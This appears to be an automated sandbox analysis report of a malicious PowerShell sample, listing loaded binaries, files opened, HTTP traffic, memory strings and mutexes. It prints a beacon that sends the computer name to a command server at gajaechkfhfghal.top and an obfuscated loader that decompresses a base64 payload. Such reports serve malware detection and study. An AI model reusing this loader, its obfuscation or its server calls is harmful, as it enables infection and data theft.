Click to jump to signature section
Source: | Binary string: System.Management.Automation.pdb` source: powershell.exe, 00000000.00000002.63150334227.0000023CC8143000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.63182545198.0000023CE2604000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.63150334227.0000023CC8143000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.63184541481.0000023CE29B2000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.63180716293.0000023CE223E000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.63150334227.0000023CC8143000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: ion.pdb source: powershell.exe, 00000000.00000002.63182545198.0000023CE2573000.00000004.00000020.00020000.00000000.sdmp |
Source: | Binary string: gement.Automation.pdb source: powershell.exe, 00000000.00000002.63180716293.0000023CE223E000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows | Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | HTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGKb-prsGIjDk7U50RpmCeJZHaUUbYwQsh9kZXts14srJ0mskGlR2Fn_kZ03iTXyYITocZCjsnoYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=LYx0lJyWQUUs9mq5oeDbDIY95Gelu3HSHEq2-F9aTUYnBOyVXAI1qXbU1XHAVrIdh5KQTDCtVYb2USCLbAtAU48v_9HCjzsZTQG9B8HXS2Ds_mQMsaerBfANf6g5PeQpUy7gJjEdI8rMKqO_eeHNOGYzkf6yoooUwPn41vswFTnHrsMUcjBvKMOS3dRjBkzYcA5PyA |
Source: global traffic | HTTP traffic detected: GET /g458bzp6m1htr.php?id=computer&key=56848542613&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGKb-prsGIjDk7U50RpmCeJZHaUUbYwQsh9kZXts14srJ0mskGlR2Fn_kZ03iTXyYITocZCjsnoYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=LYx0lJyWQUUs9mq5oeDbDIY95Gelu3HSHEq2-F9aTUYnBOyVXAI1qXbU1XHAVrIdh5KQTDCtVYb2USCLbAtAU48v_9HCjzsZTQG9B8HXS2Ds_mQMsaerBfANf6g5PeQpUy7gJjEdI8rMKqO_eeHNOGYzkf6yoooUwPn41vswFTnHrsMUcjBvKMOS3dRjBkzYcA5PyA |
Source: global traffic | HTTP traffic detected: GET /g458bzp6m1htr.php?id=computer&key=56848542613&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive |
Source: global traffic | HTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgS_YOPMGKb-prsGIjDk7U50RpmCeJZHaUUbYwQsh9kZXts14srJ0mskGlR2Fn_kZ03iTXyYITocZCjsnoYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=LYx0lJyWQUUs9mq5oeDbDIY95Gelu3HSHEq2-F9aTUYnBOyVXAI1qXbU1XHAVrIdh5KQTDCtVYb2USCLbAtAU48v_9HCjzsZTQG9B8HXS2Ds_mQMsaerBfANf6g5PeQpUy7gJjEdI8rMKqO_eeHNOGYzkf6yoooUwPn41vswFTnHrsMUcjBvKMOS3dRjBkzYcA5PyA |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB52B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$vtsocz97xahwdgu/$4rjevxb7wzy2d0k.php? |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB52B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://$vtsocz97xahwdgu/$4rjevxb7wzy2d0k.php?id=$env:computername&key=$wloaqinbk&s=527 |
Source: powershell.exe, 00000000.00000002.63180716293.0000023CE2204000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06 |
Source: powershell.exe, 00000000.00000002.63180716293.0000023CE21A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000000.00000002.63182135205.0000023CE2410000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micre |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB31B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCB398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCAC4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB31B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCAC4B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527 |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB31B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527p |
Source: powershell.exe, 00000000.00000002.63174004315.0000023CDA095000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/ |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/ |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCB3B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB3B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/ |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB3B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/&q=EgS_YOPMGKb-prsGIjDk7U50RpmCeJZHaUUbYwQsh9kZXts14srJ0mskGlR2Fn_kZ03iTXyYITo |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCAEF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCB398000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS_YOPMGKb-prsGIjDk7U50RpmCeJZH |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCAEF6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.google.comXV |
Source: powershell.exe, 00000000.00000002.63180716293.0000023CE2204000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.quovadis.bm0 |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA021000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000000.00000002.63174004315.0000023CDA095000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000000.00000002.63174004315.0000023CDA095000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000000.00000002.63174004315.0000023CDA095000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB398000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCA24B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/PesterXz |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCB92C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000000.00000002.63174004315.0000023CDA095000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000000.00000002.63180716293.0000023CE2204000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0 |
Source: powershell.exe, 00000000.00000002.63151203330.0000023CCAF0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCB3C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCB398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.63151203330.0000023CCB3B5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/api.js |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:304:WilStaging_02 |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7444:120:WilError_03 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $8qly20dskx6zmab.((-join (@((-7782+7849),(2795-2684),(417872/(-642+(-5023+9396))),(7661-7540),(5877-5793),(1024308/(37142700/4025)))| ForEach-Object { [char]$_ })))( $w4vlxhq9nyokgrm ) $8qly20dskx6zmab.(([char[]]@((-5716+(11144-5361)),(-1665+(6333156/(24368184/6822))),(2685-2574),(-4522+4637),(133522/1322)) -join ''))()$chfqxova1ntw3im.(([system.String]::new(@((5674-(17437770/(8936-5826))),(6989-(60346370/(80736620/9206))),(2889-2778),(-4267+4382),(3998-3897)))))()[byte[]] $yex2qc9d4snha5w = $w4vlxhq9nyokgrm.(([char[]]@((7474-(-2459+(6536+(-1159+4472)))),(436452/3932),(4775-4710),(6873-6759),(2066-(7246-(53945860/(6592+3598)))),(-6258+6355),(-5831+5952)) -join ''))() $niyp3rlzdm8g6xs=$yex2qc9d4snha5w return $niyp3rlzdm8g6xs}[System.Text.Encoding]::ascii.(([system.String]::new(@((414427/5837),(721241/7141),(-5256+(10631188/(8527511/(5739-1430)))),(-1214+(-8260+(18921-(5693312/608)))),(-8130+8246),(-6947+(34598900/4900)),(184170/1754),(-2117+2227),(-2970+(9607-(4436+(1152+(6566186/(12284-5343))))))))))((h5m19374nrjqwtegxz68lcu0adp "buRhN2t6c2V8dZjwKuB14Bq97CY4qlRMQZkF7aZEhO58VzTwSSDYtpNbfOdoWZz5Of6LZaDfO7jGDkuT2/GMel8fWPNZW0IKCyH2ZJ7FJzCT1m5zqFDeiBEGCoqEhBKbzhMbypOfhEpWuhpyDxqewa6x+J632ioyT9YWzo+AkYCN0oLDbjP0SJyGkYuJShrCppATzayxHPtGyovUi4Sczp6JFAIP+4oU0FSu+IVFS9qCmcajjoIRe1KuRsBou8scLQSmTlK8QScm+l7nGI6cYf2Z6R/zvoTjSCV3SlCsRabqJ/sLj9BWK7g2zuuVbWZlDFLf7SESCgnVsFkDkbUY2hdvTLJJDHp2EFa/KbFgFNaPuQW2nbTxhABH2unJ0Q+Y5r0vHAJRWkDFoVLkumc4YPAfxxCe24LhZYQTG8KP5TYbTAaqVIiL4AT3Rnkb24DCTIvL6K5gy5iVLXMl1B9upLytuYIMFrKZmqTueGXFjFjDjOzfnvA0aBcJlMqvIjrzDZqQEPRGyh0JETq751TSZDDheFJmzAASQPlR2t3OL3OvwYZZ9Xa6obJ9jJjg4OqLI5Y5O06fBhOn2kC4u26tb/GsLx43QLnBx1+UwvO8p7T0pKP+N9o6Px6QFZeUAJPFkofExDoEGcT+AEcS1lrk856taZxE/v/aaF7l7t0j6BNTuyumJyQHgfVu1ItZsvWa/cmeuDKinaFiEp234Mr9YZPU7wPjWFkoPrKKFO7roKMj/kudK2N3uVL3RrDSnrh+YoQGio3iVK6enVklCHnSeaag2VALIj6zT0MFReaRP8AhdeH18hJHOJ0PWBi8iDlq0F9Fg0md4zO62e8Rp7Ph46eohzf2r8WiKrlftbYdfyxpbn4k/AAOrLAoNC7G5rgvnVwwV+Q2aejKGi3rOs+f+WbKwHMX2VfAzPx8G93JgdWNLJdSIUmQYEZULKClrHLb79IRTxaFspSOgOCf+tx2CNGPPFrmR8rcLxMSj5afioYfYgpzD9OU1ZqfitJ36ukXxbNUK+RfhKfvIufketxMXo0uehSFn9kASB1eQqZfYDXna9sxLPNWzZ+KgN7vouLSCpqxfEVJ1jO4c1vOA40O3JriKC2UM92WOvP8wOfXd5MJJJ+cp2p1fpcXVo+w53UAaueVul6KOubtqXyX4wS/xWI08UDqkNlwoF/L5YZtJS+GepfEZl3BJ8v+tP8ic/RqARvfNuhWyaF2j6R6Dao4D98O3u4QWxG92eIlv4LXBpeHruryTtae25mbpmoP+jOojpyk9NSmiJ+ai8CNgXFpwahvBRWP0B6OqKHDh2DPZJtYIqG3qF9RU0YlHG/4x5X15Uq/T8ylgGz8NJe0Zh/b |